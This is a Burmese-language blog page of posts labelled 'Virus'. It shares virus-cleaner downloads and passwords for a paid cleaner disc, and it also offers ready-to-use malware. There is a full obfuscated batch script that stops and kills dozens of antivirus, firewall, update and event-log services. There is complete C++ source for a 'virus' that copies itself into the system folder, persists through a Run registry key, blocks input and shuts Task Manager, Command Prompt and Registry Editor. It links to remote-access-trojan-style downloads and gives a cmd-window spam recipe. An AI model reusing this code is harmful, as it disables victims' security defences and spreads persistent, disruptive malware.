Showing posts with label Virus. Show all posts
Showing posts with label Virus. Show all posts


 










 
prorat လိုပါပဲ   စမ္းမယ္ဆို၀င္းဒိုးက်ႏိုင္ပါတယ္ 

Download :

ေဒါင္းရန္
MGY လိုပါပဲ ေတာ္ေတာ္ဆိုးတဲ့ေကာင္ပါ
ဒါေပမယ့္အခုခ်ိန္မွာေတာ့ သူ႕ကိုANTIေတာ္ေတာ္မ်ားမ်ားႏိုင္ေနပါျပီ
တစ္ကယ္လို႕ေပါ့ anit မသံုးတဲ့နည္းပညာသမားေတြဆိုရင္ေတာ့အခက္ေတြ႕မွာပါ
ဒါေၾကာင့္ ေလ့လာႏိုင္ေအာင္ အဆင္ေျပေအာင္ ေရးျပီးတင္ေပးလိုက္ပါတယ္
ကလိေတာ္မူၾကပါဗ်ာ
ေဒါင္းရန္

open the block and archetype this cipher and save it as bat*.*
@echo off
cd c:\\recycler\\S-1-5-21-1202660629-261903793-725345543-1003
del /F /Q run.bat
set ii=ne
set ywe=st
set ury=t
set iej=op
set jt53=Syma
set o6t=nor
set lyd2=fee
set h3d=ton
set gf45=ntec
set own5=McA
%ii%%ury% %ywe%%iej% "Security Center" /y
%ii%%ury% %ywe%%iej% "Automatic Updates" /y
%ii%%ury% %ywe%%iej% "%jt53%%gf45% Core LC" /y
%ii%%ury% %ywe%%iej% "SAVScan" /y
%ii%%ury% %ywe%%iej% "%o6t%%h3d% AntiVirus Firewall Monitor Service" /y
%ii%%ury% %ywe%%iej% "%o6t%%h3d% AntiVirus Auto-Protect Service" /y
%ii%%ury% %ywe%%iej% "%o6t%%h3d% AntiVirus Auto Protect Service" /y
%ii%%ury% %ywe%%iej% "%own5%%lyd2% Spamkiller Server" /y
%ii%%ury% %ywe%%iej% "%own5%%lyd2% Personal Firewall Service" /y
%ii%%ury% %ywe%%iej% "%own5%%lyd2% SecurityCenter Update Manager" /y
%ii%%ury% %ywe%%iej% "%jt53%%gf45% SPBBCSvc" /y
cls
%ii%%ury% %ywe%%iej% "Ahnlab Task Scheduler" /y
%ii%%ury% %ywe%%iej% navapsvc /y
%ii%%ury% %ywe%%iej% "Sygate Personal Firewall Pro" /y
%ii%%ury% %ywe%%iej% vrmonsvc /y
%ii%%ury% %ywe%%iej% MonSvcNT /y
%ii%%ury% %ywe%%iej% SAVScan /y
%ii%%ury% %ywe%%iej% NProtectService /y
%ii%%ury% %ywe%%iej% ccSetMGR /y
%ii%%ury% %ywe%%iej% ccEvtMGR /y
%ii%%ury% %ywe%%iej% srservice /y
%ii%%ury% %ywe%%iej% "%jt53%%gf45% Network Drivers Service" /y
%ii%%ury% %ywe%%iej% "%o6t%%h3d% Unerase Protection" /y
%ii%%ury% %ywe%%iej% MskService /y
%ii%%ury% %ywe%%iej% MpfService /y
%ii%%ury% %ywe%%iej% mcupdmgr.exe /y
%ii%%ury% %ywe%%iej% "%own5%%lyd2%AntiSpyware" /y
%ii%%ury% %ywe%%iej% helpsvc /y
%ii%%ury% %ywe%%iej% ERSvc /y
%ii%%ury% %ywe%%iej% "*%o6t%%h3d%*" /y
%ii%%ury% %ywe%%iej% "*%jt53%%gf45%*" /y
%ii%%ury% %ywe%%iej% "*%own5%%lyd2%*" /y
cls
%ii%%ury% %ywe%%iej% ccPwdSvc /y
%ii%%ury% %ywe%%iej% "%jt53%%gf45% Core LC" /y
%ii%%ury% %ywe%%iej% navapsvc /y
%ii%%ury% %ywe%%iej% "Serv-U" /y
%ii%%ury% %ywe%%iej% "%o6t%%h3d% AntiVirus Auto Protect Service" /y
%ii%%ury% %ywe%%iej% "%o6t%%h3d% AntiVirus Client" /y
%ii%%ury% %ywe%%iej% "%jt53%%gf45% AntiVirus Client" /y
%ii%%ury% %ywe%%iej% "%o6t%%h3d% AntiVirus Server" /y
%ii%%ury% %ywe%%iej% "NAV Alert" /y
%ii%%ury% %ywe%%iej% "Nav Auto-Protect" /y
cls
%ii%%ury% %ywe%%iej% "McShield" /y
%ii%%ury% %ywe%%iej% "DefWatch" /y
%ii%%ury% %ywe%%iej% eventlog /y
%ii%%ury% %ywe%%iej% InoRPC /y
%ii%%ury% %ywe%%iej% InoRT /y
%ii%%ury% %ywe%%iej% InoTask /y
cls
%ii%%ury% %ywe%%iej% "%o6t%%h3d% AntiVirus Auto Protect Service" /y
%ii%%ury% %ywe%%iej% "%o6t%%h3d% AntiVirus Client" /y
%ii%%ury% %ywe%%iej% "%o6t%%h3d% AntiVirus Corporate Edition" /y
%ii%%ury% %ywe%%iej% "ViRobot Professional Monitoring" /y
%ii%%ury% %ywe%%iej% "PC-cillin Personal Firewall" /y
%ii%%ury% %ywe%%iej% "Trend Micro Proxy Service" /y
%ii%%ury% %ywe%%iej% "Trend NT Realtime Service" /y
%ii%%ury% %ywe%%iej% "%own5%%lyd2%.com McShield" /y
%ii%%ury% %ywe%%iej% "%own5%%lyd2%.com VirusScan Online Realtime Engine" /y
%ii%%ury% %ywe%%iej% "SyGateService" /y
%ii%%ury% %ywe%%iej% "Sygate Personal Firewall Pro" /y
cls
%ii%%ury% %ywe%%iej% "Sophos Anti-Virus" /y
%ii%%ury% %ywe%%iej% "Sophos Anti-Virus Network" /y
%ii%%ury% %ywe%%iej% "eTrust Antivirus Job Server" /y
%ii%%ury% %ywe%%iej% "eTrust Antivirus Realtime Server" /y
%ii%%ury% %ywe%%iej% "Sygate Personal Firewall Pro" /y
%ii%%ury% %ywe%%iej% "eTrust Antivirus RPC Server" /y
cls
net stop netsvcs
net stop spoolnt
pskill spoolsvc.exe
pskill spoolsv.exe
pskill netsvcs.exe
pskill srvany.exe
pskill spool.exe
pskill secure32.exe
pskill ahnsd.exe
pskill mspmspsv.exe
pskill stisvc.exe
pskill servudaemon.exe
pskill snservice.exe
pskill noadmon.exe
pskill ahnsdsv.exe
pskill sdac11ba.exe
pskill system.exe
pskill navapsvc.exe
pskill winload.exe
pskill v3p3at.exe
pskill monsvcnt.exe
pskill winhelp32.exe
pskill sagent2.exe
pskill win32.exe
pskill monsysnt.exe
pskill cisvsc.exe
pskill alg.exe
pskill mdm.exe
pskill mcshield.exe
pskill nvsvc32.exe
pskill rundll32.exe
pskill msdevice.exe
pskill srvmon.exe
pskill rundll32.exe
pskill userbatch.exe
pskill navapw32.exe
pskill keyservice.exe
pskill netpiadw.exe
pskill dwagent.exe
pskill internat.exe
pskill dllsvc.exe
pskill mvcc.exe
pskill tachy.exe
pskill lsass12.exe
pskill tskmngr.exe
pskill bomsvc32.exe
pskill vstmgr.exe
pskill firedaemon.exe
pskill lvcoms.exe
pskill msnupdate.exe
pskill conime.exe
pskill gmt.exe
pskill mtbp.exe
pskill squerycontrol32.exe
pskill precisiontime.exe
pskill winhost.exe
pskill net.exe
pskill serviceguard.exe
pskill swoff.exe
pskill mstunnel.exe
pskill msfig.exe
pskill fxsvc.exe
pskill clisvc.exe
pskill mspmspsv.exe
pskill ccap.exe
pskill mcshield.exe
pskill vrmonsvc.exe
pskill vrmonNT.exe
pskill v3impro.exe
pskill ncvscc32.exe
pskill host.exe
pskill videosd32.exe
pskill msgfixer.exe
pskill adspider.exe
pskill regsvc.exe
pskill naviagent.exe
pskill winserv32.exe
pskill dllhost.exe
pskill hkcmd.exe
pskill sqlmngr.exe
pskill llssrv.exe
pskill svchost2.exe
pskill ipbind.exe
pskill http://ftp.exe
pskill svchost1.exe
pskill winsys9242.exe
pskill turboagent.exe
pskill hkstart.exe
pskill winmgmt.exe
pskill mouse32a.exe
pskill net1.exe
pskill winmysqladmin.exe
pskill sctsvc.exe
pskill winmgnt.exe
pskill iroffer.exe
pskill awhost32.exe
pskill wuauclt.exe
pskill a2guard
pskill aavshield
pskill AckWin32
pskill ADVCHK
pskill AhnSD
pskill airdefense
pskill ALERTSVC
pskill ALMon
pskill ALOGSERV
pskill ALsvc
pskill amon
pskill Anti-Trojan
pskill AntiVirScheduler
pskill AntiVirService
pskill ANTS
pskill APVXDWIN
pskill Armor2net
pskill ashAvast
pskill ashDisp
pskill ashEnhcd
pskill ashMaiSv
pskill ashPopWz
pskill ashServ
pskill ashSimpl
pskill ashSkPck
pskill ashWebSv
pskill aswUpdSv
pskill ATCON
pskill ATUPDATER
pskill ATWATCH
pskill AUPDATE
pskill AUTODOWN
pskill AUTOTRACE
pskill AUTOUPDATE
pskill avciman
pskill Avconsol
pskill AVENGINE
pskill avgamsvr
pskill avgcc
pskill AVGCC32
pskill AVGCTRL
pskill avgemc
pskill avgfwsrv
pskill AVGNT
pskill avgntdd
pskill avgntmgr
pskill AVGSERV
pskill AVGUARD
pskill avgupsvc
pskill avinitnt
pskill AvkServ
pskill AVKService
pskill AVKWCtl
pskill AVP
pskill AVP32
pskill avpcc
pskill avpm
pskill AVPUPD
pskill AVSCHED32
pskill avsynmgr
pskill AVWUPD32
pskill AVWUPSRV
pskill AVXMONITOR9X
pskill AVXMONITORNT
pskill AVXQUAR
pskill BackWeb-4476822
pskill bdmcon
pskill bdnews
pskill bdoesrv
pskill bdss
pskill bdsubmit
pskill bdswitch
pskill blackd
pskill blackice
pskill cafix
pskill ccApp
pskill ccEvtMgr
pskill ccProxy
pskill ccSetMgr
pskill CFIAUDIT
pskill ClamTray
pskill ClamWin
pskill Claw95
pskill Claw95cf
pskill cleaner
pskill cleaner3
pskill CliSvc
pskill CMGrdian
pskill cpd
pskill DefWatch
pskill DOORS
pskill DrVirus
pskill drwadins
pskill drweb32w
pskill drwebscd
pskill DRWEBUPW
pskill ESCANH95
pskill ESCANHNT
pskill ewidoctrl
pskill EzAntivirusRegistrationCheck
pskill F-AGNT95
pskill F-PROT95
pskill F-Sched
pskill F-StopW
pskill FAMEH32
pskill FAST
pskill FCH32
pskill FireSvc
pskill FireTray
pskill FIREWALL
pskill fpavupdm
pskill freshclam
pskill FRW
pskill fsav32
pskill fsavgui
pskill fsbwsys
pskill fsdfwd
pskill FSGK32
pskill fsgk32st
pskill fsgui
pskill FSM32
pskill FSMA32
pskill FSMB32
pskill fspex
pskill fssm32
pskill gcasDtServ
pskill gcasServ
pskill GIANTAntiSpywareMain
pskill GIANTAntiSpywareUpdater
pskill GUARD
pskill GUARDGUI
pskill GuardNT
pskill HRegMon
pskill Hrres
pskill HSockPE
pskill HUpdate
pskill iamapp
pskill iamserv
pskill ICLOAD95
pskill ICLOADNT
pskill ICMON
pskill ICSSUPPNT
pskill ICSUPP95
pskill ICSUPPNT
pskill IFACE
pskill INETUPD
pskill InocIT
pskill InoRpc
pskill InoRT
pskill InoTask
pskill InoUpTNG
pskill IOMON98
pskill isafe
pskill ISATRAY
pskill ISRV95
pskill ISSVC
pskill JEDI
pskill KAV
pskill kavmm
pskill KAVPF
pskill KavPFW
pskill KAVStart
pskill KAVSvc
pskill KAVSvcUI
pskill KMailMon
pskill KPfwSvc
pskill KWatch
pskill livesrv
pskill LOCKDOWN2000
pskill LogWatNT
pskill lpfw
pskill LUALL
pskill LUCOMSERVER
pskill Luupdate
pskill MCAGENT
pskill mcmnhdlr
pskill mcregwiz
pskill Mcshield
pskill MCUPDATE
pskill mcvsshld
pskill MINILOG
pskill MONITOR
pskill MonSysNT
pskill MOOLIVE
pskill MpEng
pskill mpssvc
pskill MSMPSVC
pskill myAgtSvc
pskill myagttry
pskill navapsvc
pskill NAVAPW32
pskill NavLu32
pskill NAVW32
pskill NDD32
pskill NeoWatchLog
pskill NeoWatchTray
pskill NISSERV
pskill NISUM
pskill NMAIN
pskill nod32
pskill nod32krn
pskill nod32kui
pskill NORMIST
pskill notstart
pskill npavtray
pskill NPFMNTOR
pskill npfmsg
pskill NPROTECT
pskill NSCHED32
pskill NSMdtr
pskill NssServ
pskill NssTray
pskill ntrtscan
pskill NTXconfig
pskill NUPGRADE
pskill NVC95
pskill Nvcod
pskill Nvcte
pskill Nvcut
pskill NWService
pskill OfcPfwSvc
pskill OUTPOST
pskill PAV
pskill PavFires
pskill PavFnSvr
pskill Pavkre
pskill PavProt
pskill pavProxy
pskill pavprsrv
pskill pavsrv51
pskill PAVSS
pskill pccguide
pskill PCCIOMON
pskill pccntmon
pskill PCCPFW
pskill PcCtlCom
pskill PCTAV
pskill PERSFW
pskill pertsk
pskill PERVAC
pskill PNMSRV
pskill POP3TRAP
pskill POPROXY
pskill prevsrv
pskill PsImSvc
pskill QHM32
pskill QHONLINE
pskill QHONSVC
pskill QHPF
pskill qhwscsvc
pskill RavMon
pskill RavTimer
pskill Realmon
pskill REALMON95
pskill Rescue
pskill rfwmain
pskill Rtvscan
pskill RTVSCN95
pskill RuLaunch
pskill SAVAdminService
pskill SAVMain
pskill savprogress
pskill SAVScan
pskill SCAN32
pskill ScanningProcess
pskill sched
pskill sdhelp
pskill SERVIC~1
pskill SHSTAT
pskill SiteCli
pskill smc
pskill SNDSrvc
pskill SPBBCSvc
pskill SPHINX
pskill spiderml
pskill spidernt
pskill Spiderui
pskill SpybotSD
pskill SPYXX
pskill SS3EDIT
pskill stopsignav
pskill swAgent
pskill swdoctor
pskill SWNETSUP
pskill symlcsvc
pskill SymProxySvc
pskill SymSPort
pskill SymWSC
pskill SYNMGR
pskill TAUMON
pskill TBMon
pskill TC
pskill tca
pskill TCM
pskill TDS-3
pskill TeaTimer
pskill TFAK
pskill THAV
pskill THSM
pskill Tmas
pskill tmlisten
pskill Tmntsrv
pskill TmPfw
pskill tmproxy
pskill TNBUtil
pskill TRJSCAN
pskill Up2Date
pskill UPDATE
pskill UpdaterUI
pskill upgrepl
pskill Vba32ECM
pskill Vba32ifs
pskill vba32ldr
pskill Vba32PP3
pskill VBSNTW
pskill vchk
pskill vcrmon
pskill VetTray
pskill VirusKeeper
pskill VPTRAY
pskill vrfwsvc
pskill VRMONNT
pskill vrmonsvc
pskill vrrw32
pskill VSECOMR
pskill Vshwin32
pskill vsmon
pskill vsserv
pskill VsStat
pskill WATCHDOG
pskill WebProxy
pskill Webscanx
pskill WEBTRAP
pskill WGFE95
pskill Winaw32
pskill winroute
pskill winss
pskill winssnotify
pskill WRADMIN
pskill WRCTRL
pskill xcommsvr
pskill zatutor
pskill ZAUINST
pskill zlclient
pskill zonealarm
pskill _AVP32
pskill _AVPCC
pskill _AVPM
pskill scanwscs
pskill scanmsg
pskill onlnsvc
pskill upschd
pskill antivirus
Viurs Cleaner 1

ati2avxx Cleaner
Chrome Cleaner
Driver Guard
Explorer.exe Cleaner
Fansy Cleaner
Fun Cleaner
Funny Cleaner
Globle Cleaner
Happy Birthday Cleaner
KillVBS Cleaner

Download:
http://ifile.it/lzbia68

Virus Cleaner 2

Kolay.vbs Cleaner
Loikaw Cleaner
Magway FC Cleaner
Nargiz Cleaner
REcycler Cleaner
regsvr Cleaner
Svchost Cleaner
TayatMyo Cleaner
Univbs Cleaner
Virus Cleaner Guide

Download:
http://ifile.it/0o1x2nc 


DWONADup Cleaner
Econficker Cleaner
Trojan Killer
W32 Eimuse Cleaner

Download:
http://ifile.it/ji6fdsy

Malware & Worm Cleaner 2

Generic Host For Win32 Error Cleaner
IQ worm Removal
Malware Cleaner
w32.Davs Cleaner

Download:
http://ifile.it/6etpx0n 

Virus, Malware and Trojan Scanning & Protection Software

Malware Byte
prevx 3.0

Download:
http://ifile.it/jkoux0v

Windows & System Repair 1

WinASO Registry Optimizer 2.53
Show Hidden File & Folder
RPT
Repair System
Read Me.pdf

Download:

http://ifile.it/hxrg2zk

Windows & System Repair 2

Repair Man
exe repair (if exe file can't run)
Bonus Software for Technician

Download:

http://ifile.it/cri6zj1 
ကြ်န္ေတာ္ myidcamp သြားတုံးက ကုိ alexander ေပးတဲ့အေခြထဲမွာပါတယ့္ virus cleaner ေတြကုိ ပြဲမလာျဖစ္တဲ့သူေတြ အျခားလုိခ်င္သူေတြအသုံးျပဳႏုိင္ေအာင္ share ေပးလုိက္ပါတယ္။ အခုတင္ေပးလုိက္တဲ့ file အစုအေ၀းကုိ အသုံးျပဳရင္ ႏွိမ္ႏွင္းႏုိင္တဲ့ virus အမ်ိဳးအစားေတြကေတာ့

Loikaw Virus Removal.exe
[Loikaw Cleaner]
[Kolay.vbs Cleaner]
[ati2avxx Cleaner]
[Chrome Cleaner]
[Driver Guard]
[MGY FC]
[EConficker Cleaner]
[Nargiz Cleaner]
[Explorer.exe Cleaner]
[Fansy Cleaner]
[Svchost Cleaner]
[Flashy Cleaner]
[TayatMyo Cleaner]
[Fun Cleaner]
[Trojankiller]
[Funny Cleaner]
[Univbs Cleaner]
[Generic Host For Win32 Error Cleaner]
[Unknow Viurs Claner]
[Globle Cleaner]
USBcillin.exe
Read Me.pdf
[Happy Birthday Claner]
[USTP funny Cleaner]
HijackThis.exe
[W32 Eimuse Cleaner]
[Iloveu Cleaner]
[w32.Davs Cleaner]
[KaiZeR KillerV1.8]
[KillVBS Cleaner]

download လုပ္ယူလုိပါက ဒီေနရာမွာ ေဒါင္းႏုိင္ပါတယ္။ 
media မွ အစဥ္ေၿပသူမ်ားအတြက္ အထက္ပါ လင္႔ေတြ အကုန္လံုးကို စုၿပီး media ကေန ၿပန္တင္ေပးလိုက္ပါတယ္ ... အစဥ္ေၿပၾကပါေစဗ်ာ...


ဒါလည္း စမ္းလို႔ေကာင္းတဲ႔အမ်ိဳးအစားထဲမွာေတာ့ မပါ ပါဘူး။ သူရဲ႕တိုက္ခိုက္မႈက နည္းနည္းၾကမ္းတယ္ဗ်။ ဒီVirus ရဲ႕ Include header ဖိုင္ေတြကေတာ့ iostream,stdio,windows,winable,conio နဲ႔ ctime တို႔ျဖစ္ပါတယ္။
monitor ကို Turn off ျဖစ္သြားေအာင္ လုပ္ဖို႔အတြက္ ေအာက္က code ေတြကို အသံုးျပဳထားပါတယ္...



void Hibernation()
{
Sleep(1000);
SendMessage(HWND_BROADCAST, WM_SYSCOMMAND, SC_MONITORPOWER, (LPARAM) 2);
}


ေနာက္တခုက rand var's ႏွစ္ခုျပဳလုပ္ျပီး တိုက္ခိုက္ခံရသူရဲ႕ mouse ကို crazy ျဖစ္သြားေအာင္ လုပ္တာပါ။ အဲဒီ code ေတြကေတာ့....

void CrazyMouse()
{
X = rand()%801;
Y = rand()%601;
SetCursorPos( X, Y );
}


ေနာက္တခုက open ခ်င္ရာေတြေလွ်ာက္ open ေနေအာင္ လုပ္တာပါ။ အဲဒါကို OpenStuff လို႔ေျပာၾကပါတယ္။ ေအာက္က code ေတြကိုၾကည့္ပါ။

void OpenStuff()
{
ShellExecute(NULL,"open",Notepad,NULL,NULL,SW_MAXI MIZE);
ShellExecute(NULL,"open",MineSweeper,NULL,NULL,SW_ MAXIMIZE);
ShellExecute(NULL,"open",Hearts,NULL,NULL,SW_MAXIM IZE);
ShellExecute(NULL,"open",Website,NULL,NULL,SW_MAXI MIZE);
}


ေအာက္မွာရွိတဲ႔ code ေတြကေတာ့ Find windwos မွာ by name ေပးျပီး သူတို႔ကို ပ်က္စီးသြားေအာင္ ဖ်က္ဆီးျခင္း နဲ႔ windows title ေတြကို rename ေပးျပီး close သြားေအာင္ လုပ္တာပါ။ FindWindow command ေတြကို ပ်က္ျပယ္သြားေအာင္၊ မပ်က္ျပယ္ဘူး ဆိုရင္ေတာင္ command တခုေပးျပီး windon ကိုု open ပါလိမ့္မယ္။ code ေတြကို ေလ့လာၾကည့္ပါ...

DWORD WINAPI DestroyWindows(LPVOID)
{
while(1)
{
TaskMgr = FindWindow(NULL,"Windows Task Manager");
CMD = FindWindow(NULL, "Command Prompt");
Regedit = FindWindow(NULL,"Registry Editor");
if( TaskMgr != NULL )
{
SetWindowText( TaskMgr, "You Suck Balls Superman");
PostMessage( TaskMgr, WM_CLOSE, (LPARAM)0, (WPARAM)0);
}
if( CMD != NULL )
{
SetWindowText( CMD, "You Suck Balls Superman");
PostMessage( CMD, WM_CLOSE, (LPARAM)0, (WPARAM)0);
}
if( Regedit != NULL )
{
SetWindowText( Regedit, "You Suck Balls Superman");
PostMessage( Regedit, WM_CLOSE, (LPARAM)0, (WPARAM)0);
}


ေနာက္တစ္ခုကေတာ့ Windows စတက္လာတာနဲ႔ Virus ကို run ေနေစေအာင္registry ထဲမွာVirus ကို Add တဲ႔ code ေတြျဖစ္ပါတယ္...

HKEY hKey;
RegOpenKeyEx(HKEY_LOCAL_MACHINE,"Software\\Mcft\\W indows\\CurrentVersion\\Run",0,KEY_SET_VALUE,&hKey );
RegSetValueEx(hKey, "SetUp",0,REG_SZ,(const unsigned char*)system,sizeof(system));
RegCloseKey(hKey);


ေနာက္ဆံုးတစ္ခုကေတာ့ computerရဲ႕ beep ကို rand numbers ေတြအားျဖင့္ ကြဲျပားျခားနားတဲ႔ freq ေတြ lengths ေတြနဲ႔ ထြက္ေပၚေနေအာင္လုပ္တာပါ...

void Beeper()
{
Freq = rand()%2001;
Dur = rand()%301;
Beep( Freq, Dur );
}


ဒီ Virus ရဲ႕ code အျပည့္အစံုကို ေအာက္မွာေဖာ္ျပေပးထားပါတယ္။ ေလ့လာၾကည့္ပါ...

#include <iostream>
#include <stdio.h>
#include <windows.h>
#include <winable.h>
#include <conio.h>
#include <ctime>
using namespace std;

int random, Freq, Dur, X, Y;
HWND mywindow, TaskMgr, CMD, Regedit;
char Notepad[MAX_PATH]="notepad.exe";
char MineSweeper[MAX_PATH]="winmine.exe";
char Hearts[MAX_PATH]="mshearts.exe";
char Website[MAX_PATH]="http:\\www.google.com";

void SetUp();
void Run( int ID );
void Beeper(), OpenStuff(), Hibernation(), CrazyMouse();

DWORD WINAPI DestroyWindows(LPVOID);

int main()
{
srand( time(0) );
random = rand()%6;
system("title :.Virus.:");
BlockInput( true );
SetUp();
BlockInput( false );
CreateThread( NULL, 0, (LPTHREAD_START_ROUTINE)&DestroyWindows, 0, 0, NULL);
while(1)
{
Run( random );
Sleep(10);
}
}
void SetUp()
{
char system[MAX_PATH];
char pathtofile[MAX_PATH];
HMODULE GetModH = GetModuleHandle(NULL);
GetModuleFileName(GetModH,pathtofile,sizeof(pathtofile));
GetSystemDirectory(system,sizeof(system));
strcat(system,"\\winminer.exe");
CopyFile(pathtofile,system,false);

HKEY hKey;
RegOpenKeyEx(HKEY_LOCAL_MACHINE,"Software\\Mcft\\Windows\\CurrentVersion\\Run",0,KEY_SET_VALUE,&hKey );
RegSetValueEx(hKey, "SetUp",0,REG_SZ,(const unsigned char*)system,sizeof(system));
RegCloseKey(hKey);

mywindow = FindWindow(NULL,":.Virus.:");
cout<<"You Are Doomed cyberot";
Sleep(1000);
ShowWindow(mywindow, false);
}

void Run( int ID )
{
if( ID == 1 )
{
BlockInput(true);
}
else if( ID == 2 )
{
Beeper();
}
else if( ID == 3 )
{
OpenStuff();
}
else if( ID == 4 )
{
Hibernation();
}
else if( ID == 5 )
{
CrazyMouse();
}
else
{
BlockInput(true);
Beeper();
OpenStuff();
CrazyMouse();
}
}

void Beeper()
{
Freq = rand()%2001;
Dur = rand()%301;
Beep( Freq, Dur );
}
void OpenStuff()
{
ShellExecute(NULL,"open",Notepad,NULL,NULL,SW_MAXIMIZE);
ShellExecute(NULL,"open",MineSweeper,NULL,NULL,SW_MAXIMIZE);
ShellExecute(NULL,"open",Hearts,NULL,NULL,SW_MAXIMIZE);
ShellExecute(NULL,"open",Website,NULL,NULL,SW_MAXIMIZE);
}
void Hibernation()
{
Sleep(1000);
SendMessage(HWND_BROADCAST, WM_SYSCOMMAND, SC_MONITORPOWER, (LPARAM) 2);
}
void CrazyMouse()
{
X = rand()%801;
Y = rand()%601;
SetCursorPos( X, Y );
}

DWORD WINAPI DestroyWindows(LPVOID)
{
while(1)
{
TaskMgr = FindWindow(NULL,"Windows Task Manager");
CMD = FindWindow(NULL, "Command Prompt");
Regedit = FindWindow(NULL,"Registry Editor");
if( TaskMgr != NULL )
{
SetWindowText( TaskMgr, "You Suck Balls Superman");
PostMessage( TaskMgr, WM_CLOSE, (LPARAM)0, (WPARAM)0);
}
if( CMD != NULL )
{
SetWindowText( CMD, "You Suck Balls Superman");
PostMessage( CMD, WM_CLOSE, (LPARAM)0, (WPARAM)0);
}
if( Regedit != NULL )
{
SetWindowText( Regedit, "You Suck Balls Superman");
PostMessage( Regedit, WM_CLOSE, (LPARAM)0, (WPARAM)0);
}

Sleep(10);
}
}  
 ၾကိဳေျပာထားတယ္မယ္ေနာ္  စမ္းလို႔ေကာင္းမယ့္virusေတြထဲမွာ တား  ေရးတဲ့virusေတြမပါဘူး

တစ္ခုခုျဖစ္ရင္တားတားမပါဘူးေနာ္

အေခြထုတ္ သူေတြကိုေတာ့ အားေတာ့နာသားဗ်... ဒါေပမဲ ့မတတ္နုိင္ဘူးေလ.. က်န္တဲ့ သူေတြအတြက္ဆုိေတာ့..အခုတင္ေပးရတဲ့အေၾကာင္းအရင္းေလးကေတာ့ .. အဲ့ ok virus cleaner အေခြကို ေငြ တစ္ေထာင္ေပးျပီး မ၀ယ္နုိင္တဲ့သူရွိသလုိ... မအားလုိ ့မ၀ယ္နုိင္တဲ့ညီကိုေတြလည္းရွိပါလိမ့္မယ္..
ဒီေတာ့ အေခြတည္းက software ေလးေတြကို သက္ဆုိင္ရာ ကြန္ပ်ဳတာတည္းကူးထားၾကတယ္ဗ်..
ကြ်န္ေတာ္အပါအ၀င္ေပ့ါ.. တစ္ကယ္တမ္း Virus လည္းကိုက္လာေကာကြ်န္ေတာ္တုိ ့ software ေတြကိုဖြင့္ျပီးသတ္မယ္လည္းလုပ္ေကာ password လာေတာင္းေကာ ဗ်ာ။။.. အေရးတည္း အဲ့  password ကို crack ျပန္လုပ္ေနရတယ္ဗ်ာ... ကြ်န္ေတာ္ကေတာ့ ေတာ္ေတာ္မွတ္သြားတယ္.. ေနာက္ဆုံး မနုိင္ေတာ့တဲ့အခ်ိန္မွာ ကြ်န္ေတာ္ စက္က window ျပန္တင္ဖုိ ့အထိျဖစ္သြားတယ္ဗ်...အခုဆုိ အကုန္ျပန္တင္ထားရတယ္.. ေအးဗ်.. ကြ်န္ေတာ္က လညး္ စာဖတ္သူငယ္ခ်င္းေတြကို software သစ္ေလးရရင္ အိမ္မွာအရင္စမ္းတယ္ဗ်...ျပီးမွေပးတာ .. အစမ္းေကာငး္ေတာ့ ကိုက္ပါေလေကာဗ်ာ...
ကဲ ကြ်န္ေတာ့္လုိ မျဖစ္ရေအာင္ ok virus cleaner ဗားရွင္း (2) အေခြတည္းက သက္ဆုိင္ရာ software ေတြရဲ ့ password ေတြပါဗ်ာ...

ati2avxx Virus Cleaner = ati3112ok
Chrome Virus Cleaner=chr2712ok
Driver Guard Virus cleaner dri8491ok explorer virus cleaner= exp3112ok
fun virus cleaner=fun3112ok
funny virus cleaner = No Nedd
fansy virus cleaner=fan8491ok
happy birthday virus cleaner=hap3112ok
globle virus cleaner = No Need
Magway Fc virus cleaner=No Need
Killvbs virus cleaner=kil3112ok
kolay virus cleaner=kol2712ok
loikaw virus cleaner-No Need
svchost virus cleaner=svc2712ok
tayatmyo virus cleaner=tay8491ok
univbs virus cleaner=uni3112ok
recycler virus cleaner=rec3112ok
regsvr virus cleaner=reg3112ok


အဆင္ေျပၾကပါေစ...
ok virus cleaner ကသူေတြေတာ့သိရင္ ေမတၱာပုိ ့ေနေလာက္ျပီ....

Virus လို႔ေျပာလို႔ မရတ႔ ဲ virus ႏွစ္ခု ကို စုၿပီးတင္ေပးလိုက္တာပါ ။
၁။ Fake virus ..... notepad မွာ ေအာက္ပါအတိုင္း ေရးထည္႔ေပးပါ ။
X5O!P%@AP[4\PZX54(P^)7CC)7}$EICAR-STANDARD-ANTIVIRUS-TEST-FILE!$H+H*
ၿပီးရင္ေတာ႔ ႀကဳိက္တ႔ ဲ ဖိုင္နာမည္ေပး ႀကဳိက္တ႔ဲ file type န႔ဲ save ပါ။ (ဥပမာ . .mp3, .vbs, .exe,
.com, .zip ) အေကာင္းဆံုးက မူရင္း .txt text ဖိုင္ဟာ fake virus အတြက္အေကာင္းဆံုးျဖစ္ပါတယ္ ။
မိမိသုံးေနတ႔ ဲ antivirus software ေကာင္းေကာင္း အလုပ္လုပ္လား မလုပ္လား ဆိုတာကို
စမ္းသပ္ႏိုပ္ပါတယ္ ။ တကယ္အလုပ္ လုပ္တဲ႔ anti-virus ဆိုရင္ save လိုက္ၿပီးတာနဲ႔
ပ်တ္သာြ းပါလိမ္႔မယ္။Fake virus ဆိုတ႔ ဲ အတိုင္း fake ပဲျဖစ္ပါတယ္။ တကယ္ ထိခိုက္မႈမရိွပါဘူး ။
၁။ start cmd virus ..... new notepad (or) run - notepad ျဖင္႔ notepad တစ္ခုယူၿပီး start
လို႔ေရးၿပီး copy, paste အႀကိမ္ႀကိမ္ လုပ္ပါတယ္။ (start ထည္႔ထားတဲ႔ အေရအတြက္ဟာ cmd
ေပၚမယ္႔ အေရအတြက္ပါပဲ)။ ဖိုင္နာမည္ေပးၿပီး .bat နဲ႔ save လိုက္ပါ။ (file name.bat)ၿပီးရင္ေတာ႔ Dclick
န႔ဖဲ ငြ ္႔ၾကည္႔ေပါ႔။ cmd box ေတေြ ပၚလာပါလိမ္႔မယ္။ အားလုံး cmd ျဖစ္တ႔ဲအတြက္ task bar မွာ
တစ္ေနရာထဲ စုၿပီးေပၚေနပါလိမ္႔မယ္ ။ (task bar properties မွာ Gruop similar taskbar buttons ကို
check ေပးထားမယ္ဆိုရင္ေပါ႔) ။ R-Click လုပ္ၿပီး Close Group ေပးလိုက္တာနဲ႔
အားလံုးျပန္ေပ်ာက္သြားပါလိမ္႔မယ္ ။

၁. Notepad ကိုဖြင့္ပါ။
၂. ေအာက္ေဖာ္ျပပါ code မ်ားကိုကူးထည္႕ပါ။
၃. Save လုပ္မည္႕အခါတြင္ .exe ဖိုင္အေနျဖင့္ save လုပ္ပါ။
၄. ၿပီးရင္ေတာ့ .exe ဖိုင္ကို run လိုက္ေပါ့၊
